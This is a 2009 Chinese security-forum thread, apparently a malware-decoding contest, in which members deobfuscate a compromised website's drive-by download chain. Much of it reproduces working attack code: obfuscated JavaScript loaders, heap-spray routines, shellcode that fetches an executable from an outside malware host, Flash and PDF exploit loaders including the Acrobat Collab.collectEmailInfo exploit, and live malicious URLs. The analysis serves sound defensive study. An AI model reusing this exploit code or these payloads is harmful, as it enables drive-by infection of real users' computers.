[解密悬赏][第30期][grasseinternational.com]

显示全部楼层 · 发表于 2009-5-23 19:12:56

宗旨：
让更多人了解如何解密网马
规则：
1、Hunter不能参加活动
2、必须把所有木马地址全部解出，不完全解密且所发URL之前没有人解出者得到相应步骤加分
3、最好有解密软件日志，如果没有，请发出具体解密过程
4、如果有违反1~2条规则的情况，本帖随即锁定，之后成功解密的作废！
5、锁定后，会重新修改本次的解密地址，并且开帖！
6、为了体现悬赏帖宗旨，昨日解密成功者再次解出今天网址的只能得到对应网址70%经验

解密地址（替换HXXP为HTTP）：

hxxp://grasseinternational.com/ (完成 by 4L shadowmin (10) , 6L gankeyu (25) ,不过得等待有权限的人员加分= =!)

一次解完（包含解密步骤）=25分（分支：Fakealert - 10分）
分步（即未解完情况）：3+4+2(EXE/此链接无效)+6(SWF->EXE)+5(PDF->EXE)

注意：这些地址含有恶意软件，可能会危害到您的计算机。请不要直接打开，否则因此造成的一切后果我们概不负责！
参考解密工具：
FreShow（英文）、 Redoce 1.9（中/E文）、malzilla （英文，但是乃神器也）
http://glacierlk.cn/openlab/jm.htm
参考解密教程：
http://bbs.kafan.cn/viewthread.php?tid=387608
http://bbs.kafan.cn/viewthread.php?tid=220550
http://bbs.kafan.cn/thread-408295-1-1.html

(时限=1天)

显示全部楼层 · 发表于 2009-5-23 19:16:42

PS.每个IP只可读取站点一次否则第二次返回空。

显示全部楼层 · 发表于 2009-5-23 21:55:01

...详子..

显示全部楼层 · 发表于 2009-5-23 22:04:05

Log is generated by FreShow.
[wide]http://grasseinternational.com/
[script]http://best4you.if.ua/js/bidch.js?q="+que+"&ref="+r+"
      [object]http://atioqe.cn/?wm=70141
         [script]http://atioqe.cn/6/js/jquery-1.2.5.pack.js
         [script]http://atioqe.cn/6/js/jquery.dimensions.min.js
         [body]http://atioqe.cn/installer_70141.exe
[frame]http://lsiu.info/evo/count.php?o=5
不知道解的对不对，没有解完

[ 本帖最后由 shadowmin 于 2009-5-23 22:07 编辑 ]

显示全部楼层 · 发表于 2009-5-23 22:21:36

还没解完.重点还没到.
你解的这http://atioqe.cn/?wm=70141
也算是比较xe的.

显示全部楼层 · 发表于 2009-5-23 22:29:05

显示全部楼层 · 发表于 2009-5-23 22:29:29

</object>

</body>
</html>

看到了这个EXE: http://atioqe.cn/installer_70141.exe
(貌似是个FakeAV:PS:那个JS解出来没什么意义..不想解了)
下面回到A1
http://extraspray.com/in.php?49771866cc11

<iframe src="http://lsiu.info/evo/count.php?o=5" style="visibility:hidden"></iframe><script>var xongovz=Array(63/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/19/**/,/**/11/**/,/**/24/**/,/**/20/**/,/**/57/**/,/**/52/**/,/**/51/**/,/**/40/**/,/**/33/**/,/**/12/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/43/**/,/**/30/**/,/**/9/**/,/**/58/**/,/**/44/**/,/**/22/**/,/**/17/**/,/**/62/**/,/**/61/**/,/**/5/**/,/**/60/**/,/**/29/**/,/**/36/**/,/**/3/**/,/**/7/**/,/**/31/**/,/**/8/**/,/**/55/**/,/**/21/**/,/**/47/**/,/**/23/**/,/**/28/**/,/**/14/**/,/**/18/**/,/**/37/**/,/**/35/**/,/**/50/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/10/**/,/**/25/**/,/**/49/**/,/**/59/**/,/**/54/**/,/**/0/**/,/**/56/**/,/**/46/**/,/**/45/**/,/**/4/**/,/**/39/**/,/**/16/**/,/**/42/**/,/**/6/**/,/**/32/**/,/**/48/**/,/**/1/**/,/**/2/**/,/**/38/**/,/**/34/**/,/**/41/**/,/**/27/**/,/**/13/**/,/**/53/**/,/**/26/**/,/**/15);var cttafwni="vKr9YjkPLPY95PtPDIsyvKr9YjNBY5MveX0BXjZyG4TztoMB!86zQgYO5UtzGbMwXl0a5JNwulYvGpsbQRrvowEbtIEyk8n2LKNVDqnyYbnbuqe2LKeK5psKmiIVQLNUtlt9ZlYPtokaviIEX9ramUFzpPWVkl6PDbkKmKFzpPWVkl6PDXQz52WUlP0BgUrwBgc9dlY9XLQUrLYzZ7YBpUrwT5M9tL6OrLYzZ7YBpUrwT5M9tL6O7wNAgHkI53Zqp9rVp90z5LQUxwkA6KrwYPrVGJ6UgHkP85MVXLQUHwNAmct9p3t94LNwgur1v8IVQLNwpcsKag69dlY9XjNIY9tzYpoKguZE28IVQLQIHfYP4UrwY7p295n2YRnAmDIE28XPLPY95PtPDqsyv8IE2cMaVfnyDRYzZlrz5J0B!B6P5f0B5lFz5pMw!3WAeRMVk2NAmiIE28Iz7gf27HNV!JMwYLFqU5qvexsz6DMwZ3WUZ5M9tPrVxpeUZ5YPg36yx9sbZ369kFMOpl6bxpN2oB6wJ8eb6LnOXREbLFs2LRE28IE26IkBg30B4peUowTU4lMVeL0BDwN26IN9HoYw!peUJo0wx5Mw6HEv8f6Ppp0U!fMz5peUJg6Bgl6UcKr9HlrwDwTVX3WP@4kOHPrVLJNV!UYzGF6BGgNwujWzGo0BtgTao8eO8L0Ph4MvsKTBDqe2XBE2uKnyoFeKgpn27wsbLXn2YFeb64QviFMz6l0wcBZPZpeU43WB8DsOGxYPglZOgJ6wGgNwkgYO5LWPHgMVXPtOufny!IWV8gszDbeKXpn2YRs28Xeb7qnbQ8Mvo8e2sFEyownbkwkOSxsOG96V5P0BSbkyv8IEDDIEDDxEDDxEgU0ApBrBZPMwtPrAcuZE2Kr9Yjkz6D0UDIQzL50zmiIEX9ramg69dpez52WUlP0BgUrwBgc9dlY9XLQUlP6PGjlITJTfRUcUgun1Zf0BZL0A5okaDDIEgU0U4qkz6DMAX9ramg69djNvcHMwsjNjZ3rVkl0rA96V5P0B4wTfRUcOq36wW3ZPH9NAmct9p3t94LNwgur1v8IVQjTAG96VgIkav8IEtlt9ZlYPtpn2miIE2cMaVfEyDRYzZlrz5J0B!B6P5f0B5lFz5pMw!3WAeRMVk2NAmiIE2cMaVfEy!86z!l6Pb3fNKpsKiFMz6l0wcBZPZpeU43WB8DsOGxYPglZOgJ6wGgNwkgYO5LWPHgMVXPtOufEy!IWV8gszDbeKXpn2YRs28Xeb7qnbQ8Mvo8e2sFEyownbkwTUso0wXLMv8ITV5oYw43rv8ITB7jrwDwN98jWzgPM9XoYz!gTPxU6USxsO5p69536veueE2cZEDDxEkf6PcHYz8psK7IsKHHYzZpsK8B8KHBt9QpsKT2kyvKr9YjkP4l0zHPYzDbNKLlEb39qKL2nbuwqKLLejtBqKLPnbsRsKCbNKLjs2sXnKLlebTlnKL2ebuwqKLjs2YIsKCiXK5Ft2tKqb5FWb7Bqy5FrjR3n25FWI0Ps25FW2TPeb5Fr2XwqIeukK5Ft2uwEy5FtbXKc2euQEeFNBWfE2uFNB8R8j0lNBRfF2tFNB39Fb8FNBtwqITlNBsFEIT2kAeFNBLFqIsFNBLFFy02kAvbNKLjs2YRnKLUebR3qKLjsjuwqKLLejXw8KCbNKLfsjLFqKL3FI8BnKLjEbuwqKLjs2uw8KCiXK5FtjtBqb5FtbYbnb5FZbRUsj5FZb3UeI5FZbXwnI5FZbWUsj5FZ25jE25FrbW9nweuQEeFNBYFcboFNBsXebLbkAeFNB8IebLFNBWjs2tFNB8BebXFNBtIEb8FNB8B8buFNBXIEy02kAvbNKLLej8BqKLfsjsInKLLejl3qKLjEyXInKLjny39qKL3E2uwqKLLEItRnKL2sjXIsKCiXK5FWb8Xej5FryLBsj5FWy39cI5FW233nI5FrIuF8jeukK5FZITLEb5FZITUcI5FrIWLs2euQEeFNBuBE2XFNBYRe2WlNBTU82WlNB7FEI8bkAeFNB0Uqb8FNBoq82kFNBsIe2T2kAeFNBkKqIubkAvbNKLUcIT2kAtP6wCbNKLLejTUqKL9EbLRnKLLEITPqKL9qjLwnKL3cjtBsKCbNKLls2LBnKLlcjLwsKCiXK5FrbtwEb5FWI8KcI5FZjTlEI5FZI3oEy5FW23LnjeukK5FrbtFFy5FZITU8KCBt9Q7kK5FWytKcIeuQEeFNB8RnIWlNBYBFytFNBkwe2XFNBRjeITlNBsFcjT2kAeFNB39EIuFNB3LsbtFNBTUFb8bkAvbNKLUcITUqKLUcILwnKLlFyRjnKLUcIR2nKLUcITU8KCiXK5FtbXKEy5Ftb8bEb5FZ2TPnj5FZbW9eI5FZb7bs25FZ232nb5FZb3Uny5FZbTUeb5FZbLweI5FZbT2eb5FZbsweI5FtbXKnb5FtbuKnb5FZ23Unb5FtbuKnb5Ft2TUnb5Ft2RUeI5FZ2kBsb5Ft2R2Eb5Ft2YBn25Ft2tBEb5Ft2uBE25Ft27Beb5Ft2LBn25FZb7web5Ft2oBEI5Ft2YBny5Ft2LBsb5Ft2oBEy5Ft2LBe25FZ2kBeb5Ft2RUnbeueEv86w4qkPLPY95PtPguZEJotPX9rV!2MvLJMwtPM98l0AtLMwH5Y9G7kK5Ft2oBe2e8kyvKr9YjQ9HgY9CpnB!lYPZf0P5LQU5FW2pjn95FW2pjn968kyvKr9YjQzGjtPDFZz5Pt9pjrw4wNKLoE27InKLoE27InKLoE27IeUgueEsLMVHl0A65YzZ76OHl6ze3WViXn27wE2gw0zGPYVCce9HgY9C7eEkf6PccMwJpez52WUl9ZPpoWAgueEQg6P4Kr9YjNVDIsyg5n28IE2m8YAC8Nz5pYrgpoADXQ9HgY9C7QzGjtPCcMat3ZPgJYwgueExgY9LpMw!3ZOs9rVXl0AexnVQ9r9Jl0Ut9t9DwTVX3WP@4kOHPrVLJNV!UYzGF6BGgNwujWzGo0BtgTaYqEaoHTP4jZUcbrVx3WVDIEU4lMVeL0BDIEUQ9r9Jl69G9Ww59rv8HsKgueEDDxE";var ufovexly=3100,zmaoiak,telzay,udfqy='',hgtxymc=cnhuvv=sdgpazip=0;for(telzay=4;telzay>0;telzay--){for(zmaoiak=Math.min(ufovexly,1024);zmaoiak>0;zmaoiak--,ufovexly--){sdgpazip|=(xongovz[cttafwni.charCodeAt(hgtxymc++)-33])<<cnhuvv;if(cnhuvv){udfqy+=eval('String.fromCharCode(81^sdgpazip&255)');sdgpazip>>=8;cnhuvv-=2}else cnhuvv=6;}}eval(udfqy);</script>

解密后得到

var success=0;
var url='http://lsiu.info/evo/getexe.exe?o=7&t=1243086915&i=1927581256&e=';
if(!success){

try{Flashver='';Flashver=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$"+"version").split(",");}catch(e){}
if(e!='[object Error]'){
  if(Flashver[2]<124){
success=1;
my_19=document.createElement('div');
my_19.innerHTML='<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1" align="middle"><param name="movie" value="http://lsiu.info/evo/exploits/x19.php?o=7&t=1243086915&i=1927581256"/><embed src="http://lsiu.info/evo/exploits/x19.php?o=7&t=1243086915&i=1927581256"/></object>';
  }
}

}

if(!success) {
var obj = null;
try{obj=new ActiveXObject("AcroPDF.PDF");}catch(e){}
if (!obj)try{obj = new ActiveXObject("PDF.PdfCtrl");}catch(e){}
if (obj) {
  success=1;
  my_18=document.createElement('div');
  my_18.innerHTML='<embed src="http://lsiu.info/evo/exploits/x18.php?o=7&t=1243086915&i=1927581256" width=0 height=0 type="application/pdf"></embed>';
}
}

var nop='90',noc='0C',scf='F';
var shellco='%u54EB%u758B%u8B3C%u3574'+'%u0378%u56F5%u768B%u0320'+
'%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE'+'%u3828%u74F2'+
'%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF'+'%u5EE7%u5E8B'+
'%u0324%u66DD%u0C8B%u8B4B'+'%u1C5E%uDD03%u048B%u038B'+
'%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u2e00%u5C2e'+
'%u2E61%u7865'+'%u0065%uC033%u0364%u3040%u0C78%u408B'+
'%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40'+
'%u408B%u953C%u8EBF%u0E4E%uE8EC'+'%uFF84%uFFFF%uEC83'+
'%u8304%u242C%uFF3C%u95D0'+'%uBF50%u1A36%u702F'+'%u6FE8'+
'%uFFF'+scf+'%u8BFF%u2454%u8DFC%uBA52%uDB33'+'%u5353%uEB52'+
'%u5324%uD0FF%uBF5D%uFE98%u0E8A'+'%u53E8%uFFF'+scf+'%u83FF'+
'%u04EC%u2C83%u6224%uD0FF%u7EBF'+'%uE2D8%uE873%uFF40'+
'%uFFFF%uFF52%uE8D0%uFFD7%uFFFF'+
'%u7468%u7074%u2F3A%u6C2F%u6973%u2E75%u6E69%u6F66%u652F%u6F76%u672F%u7465%u7865%u2E65%u7865%u3F65%u3D6F%u2637%u3D74%u3231%u3334%u3830%u3936%u3531%u6926%u313D%u3239%u3537%u3138%u3532%u2636%u3D65';

if(!success){
mystring=unescape(shellco+'%u3132');
var block=unescape("%u0a0a%u0a0a");
var nops=unescape("%u9090%u9090%u9090");
while(block.length<81920)block+=block;
var mem=new Array();
for(var i=0;i<1000;i++)mem+=(block+nops+mystring);
document.write('<iframe src="http://lsiu.info/evo/exploits/x21x1.php" width=0 height=0 frameborder=0>');
}

配合原来的地址即
SHELLCODE解密出：
http://lsiu.info/evo/getexe.exe? ... i=1927581256&e=
FLASH:
C1 : http://lsiu.info/evo/exploits/x1 ... 15&i=1927581256
EXE:
http://lsiu.info/evo/getexe.exe? ... i=1927581256&e=
PDF:
C2 : http://lsiu.info/evo/exploits/x1 ... 15&i=1927581256
IFRAME:
C3 : http://lsiu.info/evo/exploits/x21x1.php
C4 : http://lsiu.info/evo/count.php?o=5

PDF C2解压并解密后得到
var mM6RItmK = new Array();

function yNYJ8yVD(HydurAUR, XbGQrcyY)
{
while (HydurAUR.length*2<XbGQrcyY) {
  HydurAUR += HydurAUR;
}

HydurAUR = HydurAUR.substring(0,XbGQrcyY/2);

return HydurAUR;
}

function ooyS1YUR()
{
var jKts_E9h = 0x0c0c0c0c;

var nop='90',noc='0C',scf='F';
var shellco='%u54EB%u758B%u8B3C%u3574'+'%u0378%u56F5%u768B%u0320'+
'%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE'+'%u3828%u74F2'+
'%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF'+'%u5EE7%u5E8B'+
'%u0324%u66DD%u0C8B%u8B4B'+'%u1C5E%uDD03%u048B%u038B'+
'%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u2e00%u5C2e'+
'%u2E76%u7865'+'%u0065%uC033%u0364%u3040%u0C78%u408B'+
'%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40'+
'%u408B%u953C%u8EBF%u0E4E%uE8EC'+'%uFF84%uFFFF%uEC83'+
'%u8304%u242C%uFF3C%u95D0'+'%uBF50%u1A36%u702F'+'%u6FE8'+
'%uFFF'+scf+'%u8BFF%u2454%u8DFC%uBA52%uDB33'+'%u5353%uEB52'+
'%u5324%uD0FF%uBF5D%uFE98%u0E8A'+'%u53E8%uFFF'+scf+'%u83FF'+
'%u04EC%u2C83%u6224%uD0FF%u7EBF'+'%uE2D8%uE873%uFF40'+
'%uFFFF%uFF52%uE8D0%uFFD7%uFFFF'+
'%u7468%u7074%u2F3A%u6C2F%u6973%u2E75%u6E69%u6F66%u652F%u6F76%u672F%u7465%u7865%u2E65%u7865%u3F65%u3D6F%u2637%u3D74%u3231%u3334%u3830%u3936%u3531%u6926%u313D%u3239%u3537%u3138%u3532%u2636%u3D65%u3831';

var mystring = unescape(shellco);

var Y9Ib6uuE = 0x400000;
var xxKaKDUU = mystring.length * 2;
var XbGQrcyY = Y9Ib6uuE - (xxKaKDUU+0x38);
var HydurAUR = unescape("%u9090%u9090");

HydurAUR = yNYJ8yVD(HydurAUR, XbGQrcyY);
var lYab6ozx = (jKts_E9h - 0x400000)/Y9Ib6uuE;

for (var gEZCi09R=0;gEZCi09R<lYab6ozx;gEZCi09R++) {
  mM6RItmK[gEZCi09R] = HydurAUR + mystring;
}
}

function RYiFEs8K()
{
var XrCU20If = app.viewerVersion.toString();
XrCU20If = XrCU20If.replace(/\D/g,'');

var TPWRJTZJ = new Array(
  XrCU20If.charAt(0),
  XrCU20If.charAt(1),
  XrCU20If.charAt(2));

if ((TPWRJTZJ[0] == 8 && ((TPWRJTZJ[1] == 1 && TPWRJTZJ[2] < 2) || TPWRJTZJ[1] < 1)) ||
   (TPWRJTZJ[0] == 7 && TPWRJTZJ[1] < 1) ||
   (TPWRJTZJ[0] < 7)) {
  ooyS1YUR();
  var nabGR_dc = unescape("%u0c0c%u0c0c");
  while(nabGR_dc.length < 44952) nabGR_dc += nabGR_dc;
  this.collabStore = Collab.collectEmailInfo({subj: "",msg: nabGR_dc});
}
}

RYiFEs8K();
解密SHELLCODE => http://lsiu.info/evo/getexe.exe? ... 1927581256&e=18

回到C3 : http://lsiu.info/evo/exploits/x21x1.php
<XML ID=I>

<X>
  <C>
<![CDATA[
<image
   SRC=http://ਊਊ.google.com
>
]]>

  </C>
</X>
</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID=I>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN>
</SPAN>
这貌似是一个XML。无视之
下面是C4 : http://lsiu.info/evo/count.php?o=5
<script>var gagnb=Array(63/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/58/**/,/**/38/**/,/**/41/**/,/**/53/**/,/**/20/**/,/**/24/**/,/**/10/**/,/**/59/**/,/**/49/**/,/**/19/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/16/**/,/**/4/**/,/**/61/**/,/**/17/**/,/**/5/**/,/**/44/**/,/**/50/**/,/**/7/**/,/**/56/**/,/**/6/**/,/**/15/**/,/**/22/**/,/**/31/**/,/**/0/**/,/**/33/**/,/**/54/**/,/**/21/**/,/**/32/**/,/**/29/**/,/**/28/**/,/**/2/**/,/**/47/**/,/**/26/**/,/**/1/**/,/**/9/**/,/**/40/**/,/**/25/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/0/**/,/**/37/**/,/**/52/**/,/**/42/**/,/**/43/**/,/**/23/**/,/**/46/**/,/**/13/**/,/**/55/**/,/**/45/**/,/**/62/**/,/**/11/**/,/**/48/**/,/**/35/**/,/**/36/**/,/**/12/**/,/**/30/**/,/**/51/**/,/**/27/**/,/**/60/**/,/**/57/**/,/**/18/**/,/**/14/**/,/**/8/**/,/**/34/**/,/**/39/**/,/**/3);var bxhhu="Ax!7s7V!7hp7dhL!q0riAx!7s70jskjE2Vfj07JiNIcHBLjjQpvHYGpYdmLHN1j00UfBdz00OUpENJ7fYc!E!FdfB0dit1di0x0tqj7is17fOjkU7xkcdJrc3uHtYr0dBUL7iUp!BLVBAuHN0q!B3mEHUhUtHUv!q1Vc3xEHUhUtHUv!qV6HdyUdJhfjym!0KGo7nUp70r6dRrpHiepjUm!0wkj7BrvYRrpHiepjUm!0wkj7BrvYhF02yTVFddJOUq!tUqfHdr6dcFV2Ex!0sh!tNzvdyTV!jkjt0r6dxF023vL7UdL71r00yK!sApHtYr00UvrcPGv7nUp7070FsqLHsJRcyKJNGpHtYr6Fx!p!1m!0segU9k7Usc7239HNGp5!7hp7dhL!qjriApHNGvjBC!7iqcpHiU!HdzfjQOv!d!fjdUEHdJj0QdU22cjtHy023uHNGpHHhGBUhT0tQzj0srEOzksE26rHE9j0idUdikj7Bh!tcJkdikp!ydvicqrfidv7HfjYUUvfcJ0U!Ov0mpkfEr7Y0cdf7frU7cdUj0dUE0Vjydfj1Jkd!Fcd1Ujt2rfjqF0UE007xLp0QJkdmLf0ckj0ETdEj!v!UJfdQ!jHdJkdmGvjyUvdfx!7xU!0qFct0dU!bIVYxh!t7z0tQmpHNfvjNG00O7UHNLfjBGcB!pkYjrf!8IjE7xcjqjkU0OdUO1rfOckcyJ7UhFrf7V7UsfkfEI6EFfjHEUf0fOJ!iJkd1dUjj9rYN6p!yUJYyzv0NG00HGpYdrU!xGjt0hLYO!7iQ0UtjGrHqfkc0J7UscrUjVrftVdfYpjE!pkUtfdi!F7fHFVYl6rYNqvtdhfjl1ViApHNq9HNq9wNq9wNymf2UO!jihj0Bh!2fKJNGx!7s7VHE9fdq06H7kfH3uHN0q!B3Gv7nJkHdyUdJhfjym!0KGo7nUp70r6dJhv!N7iFwzch6modyK7si!fjirf2dLVBq9HNymfd1jVHE9j20q!B3Gv7n70EfTj0t70qid!tHUf3Wqvtdhfj1Fch6moYpdv0gdJ!xq023vL7UdL71r00yK!sApHtY7c2Nqvty0VBApHNBUL7iUp!BJ7U3uHNGvjBC!diqcpHiU!HdzfjQOv!d!fjdUEHdJj0QdU22cjtHy023uHNGvjBC!diQpvHQUv!IdBlTJrcFfjHEUf0fOJ!iJkd1dUjj9rYN6p!yUJYyzv0NG00HGpYdrU!xGjt0hLYO!diQ0UtjGrHqfkc0J7UscrUjVrftVdfYpjE!pkUtfdi!F7fHFcdtLf00rjEj0ctdLp01d!Ej0cjh7!0qF07j7UHyhj70LpHQGc!cmvdl6rYdJv7ddvE2KkNGvJNq9wNH!v!fTpHjJrch0rcxTpHiJrcjOScxOL7YJrcwyViAx!7s7V!1UfHxhpHq10c7Udfkqsc7y7fOFsc7rkqBOsc7h7ftcrca10c77rUtV7c7UkfwU7c7ykfOFsc77rUs0rcau5cdfLUBxsfdfUfhOsidf!q6d7UdfUFohrUdfUUwhkfdf!U0FsF2KVcdfLUOFdidfLf0xoU2K6N2f0jg!dUOf0jjcSqoU0j6!EUBf0jkqEfjf0jBFsFwU0jtfdFwyV22f0j7fsFtf0j7fEioyV2A10c77rUsc7c7mkf6dsc77rqOFsc7rkq0FSca10c7!rq7fsc7dEFjO7c77dfOFsc77rUOFScau5cdfLqBOsfdfLfs17fdfJf6mrqdfJfkmkFdfJf0F7FdfJfgmrqdfJUd7dUdf!fgq702K6N2f0jsfof0f0jtVkf71V22f0jj0kf7f0jg7rUBf0jjOkf0f0jB0dfjf0jjOSfOf0j00dioyV2A10c7rkqjOsc7!rqt07c7rkqJdsc77di007c777ikqsc7ddUOFsc7rdFBc7c7yrq00rcau5cdfUfjVkqdf!i7OrqdfUikqoFdfUUkd7Fdf!FOfSq2KVcdfJFwrdfdfJFwmoFdf!FgrrU2K6N2f0jOOdU0f0jsckUgU0jwmSUgU0jhfdFj1V22f0jomsfjf0j!jSUHf0jt0kUwyV22f0jHxsFO1V2A10c7moFwyV2Bhv0a10c7rkqwmsc7qdf7c7c7rdFwhsc7qsq7F7c7doqBOrca10c7UrU7O7c7Uoq7Frcau5cdf!fBFdfdfUFjxoFdfJqwUdFdfJFkLdidfUUkr7q2KVcdf!fBfEidfJFwmScaOL7YeVcdfUiBxoF2K6N2f0jjc7FgU0jsOEiBf0jHFkU0f0j67kFwU0jtfoqwyV22f0jkqdFOf0jkrrfBf0jwmEfj1V2A10c7moFwmsc7moF7F7c7UEi677c7moF6y7c7moFwmScau5cdfLf0xdidfLfj1dfdfJUwh7qdfJfgqkFdfJfh1rUdfJUky7fdfJfkm7idfJfwmkfdfJf7FkFdfJfwykfdfJftFkFdfLf0x7fdfLfOx7fdfJUkm7fdfLfOx7fdfLUwm7fdfLU6mkFdfJUHO7fdfLU6ydfdfLUsO7UdfLUBOdfdfLUOOdUdfLUtOrfdfLU0OdidfJfhFkfdfLU!OdFdfLUsO7idfLU7OrfdfLU!OdidfLU7OkUdfJUHOkfdfLU6m7f2KkNApv01jV!7hp7dhL!yKJNmLL!0q!tQyjE7zj0Bhj7jUf2Brj0xkp7NeVcdfLU!OkU2pViAx!7s767xGp7aJ7jQUp!i!f!dr6ddfUUU777dfUUU777EpViAx!7s76HN7L!qfJHdhL7U7!01F0c7LdUh07c7LdUh07c7LdUh0kdyKkNtrjtxUf2EkpHievYxUvH2dUtFV7UhFdUyFfHNhptavk7xGp7aekNH!v!fvj0mJkHdyUdJqJ!ULU2yKkNYGv!1x!7s70tq0riyk7Uj0dU3pp2ap0HdJp3yJR2qV67xGp7ae6HN7L!avjBBdJ!yzp0yKkNcGp77Jj0QdJYtq!t0Uf2267tYq!7mUfdBqL7qFct0dU!bIVYxh!t7z0tQmpHNfvjNG00O7UHNLfjBGcBsjdB!Tc!17Jdf1!tcdUtq0dd1Ujt2rfjq0ddYq!7mUv7NqU0dq!EjTrcyKkNq9wN";var kfftgqs=3100,oaho,uqrwn,xrghjxfi='',xfxrqxgj=qxzxfwk=bkyty=0;for(uqrwn=4;uqrwn>0;uqrwn--){for(oaho=Math.min(kfftgqs,1024);oaho>0;oaho--,kfftgqs--){bkyty|=(gagnb[bxhhu.charCodeAt(xfxrqxgj++)-33])<<qxzxfwk;if(qxzxfwk){xrghjxfi+=eval('String.fromCharCode(142^bkyty&255)');bkyty>>=8;qxzxfwk-=2}else qxzxfwk=6;}}eval(xrghjxfi);</script>
又是脑残加密法..
解出来

var success=0;
var url='http://lsiu.info/evo/getexe.exe?o=5&t=1243087784&i=1927581256&e=';
if(!success){

try{Flashver='';Flashver=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$"+"version").split(",");}catch(e){}
if(e!='[object Error]'){
  if(Flashver[2]<124){
success=1;
my_19=document.createElement('div');
my_19.innerHTML='<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1" align="middle"><param name="movie" value="http://lsiu.info/evo/exploits/x19.php?o=5&t=1243087784&i=1927581256"/><embed src="http://lsiu.info/evo/exploits/x19.php?o=5&t=1243087784&i=1927581256"/></object>';
  }
}

}

if(!success) {
var obj = null;
try{obj=new ActiveXObject("AcroPDF.PDF");}catch(e){}
if (!obj)try{obj = new ActiveXObject("PDF.PdfCtrl");}catch(e){}
if (obj) {
  success=1;
  my_18=document.createElement('div');
  my_18.innerHTML='<embed src="http://lsiu.info/evo/exploits/x18.php?o=5&t=1243087784&i=1927581256" width=0 height=0 type="application/pdf"></embed>';
}
}

var nop='90',noc='0C',scf='F';
var shellco='%u54EB%u758B%u8B3C%u3574'+'%u0378%u56F5%u768B%u0320'+
'%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE'+'%u3828%u74F2'+
'%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF'+'%u5EE7%u5E8B'+
'%u0324%u66DD%u0C8B%u8B4B'+'%u1C5E%uDD03%u048B%u038B'+
'%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u2e00%u5C2e'+
'%u2E64%u7865'+'%u0065%uC033%u0364%u3040%u0C78%u408B'+
'%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40'+
'%u408B%u953C%u8EBF%u0E4E%uE8EC'+'%uFF84%uFFFF%uEC83'+
'%u8304%u242C%uFF3C%u95D0'+'%uBF50%u1A36%u702F'+'%u6FE8'+
'%uFFF'+scf+'%u8BFF%u2454%u8DFC%uBA52%uDB33'+'%u5353%uEB52'+
'%u5324%uD0FF%uBF5D%uFE98%u0E8A'+'%u53E8%uFFF'+scf+'%u83FF'+
'%u04EC%u2C83%u6224%uD0FF%u7EBF'+'%uE2D8%uE873%uFF40'+
'%uFFFF%uFF52%uE8D0%uFFD7%uFFFF'+
'%u7468%u7074%u2F3A%u6C2F%u6973%u2E75%u6E69%u6F66%u652F%u6F76%u672F%u7465%u7865%u2E65%u7865%u3F65%u3D6F%u2635%u3D74%u3231%u3334%u3830%u3737%u3438%u6926%u313D%u3239%u3537%u3138%u3532%u2636%u3D65';

if(!success){
mystring=unescape(shellco+'%u3132');
var block=unescape("%u0a0a%u0a0a");
var nops=unescape("%u9090%u9090%u9090");
while(block.length<81920)block+=block;
var mem=new Array();
for(var i=0;i<1000;i++)mem+=(block+nops+mystring);
document.write('<iframe src="http://lsiu.info/evo/exploits/x21x1.php" width=0 height=0 frameborder=0>');
}
解出来就是和前面差不多的东西

显示全部楼层 · 发表于 2009-5-23 22:35:35

请稍等。。分数1天内送上。。

显示全部楼层 · 发表于 2009-5-23 22:38:12

swf / pdf 某步骤

ps。为什么我解得时候这网站把我分到一个bt点的站点去了。。

参考步骤
1>>http://grasseinternational.com
2>>http://extraspray.com/in.php?68686866cc11
3>>http://lsiu.info/evo/count.php?o=7
4>>http://lsiu.info/evo/getexe.exe?o=7&t=1243074525&i=2030322241&e=
4>>http://lsiu.info/evo/exploits/x18.php?o=7&t=1243074525&i=2030322241 (pdf)
5>>http://lsiu.info/evo/getexe.exe?o=7&t=1243074525&i=2030322241&e=18
4>>http://lsiu.info/evo/exploits/x19.php?o=7&t=1243074525&i=2030322241 (swf)
5>>http://lsiu.info/evo/getexe.exe?o=7&t=1243074525&i=2030322241&e=18

显示全部楼层 · 发表于 2009-5-23 22:50:27

某人RP不好

[其它] [解密悬赏][第30期][grasseinternational.com]

评分

回复 4楼 shadowmin 的帖子

评分